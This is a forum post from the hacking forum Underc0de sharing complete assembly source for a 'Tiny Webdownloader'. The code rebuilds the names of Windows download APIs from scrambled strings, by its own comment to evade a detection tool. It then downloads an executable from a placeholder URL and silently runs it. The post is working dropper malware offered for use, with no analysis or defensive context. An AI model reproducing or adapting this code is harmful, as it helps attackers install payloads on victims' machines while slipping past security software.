Underc0de
Programación General => ASM => Mensaje iniciado por: ANTRAX en Junio 05, 2012, 04:42:49 PM
;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;[email protected]
.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0
.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?
.code
_main:
;unscrambles urlmon.dll
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1
;unscrambles URLDownloadToFileA
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5
;loads urlmon.dll
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax
;links URLDownloadToFileA dynamically
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax
;delete previous version
invoke DeleteFile, addr Exe
;downloads the exe
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile
;runs the exe
invoke WinExec, addr Exe, 0
;exits
invoke ExitProcess, 0
end _main
By X-Ray Cat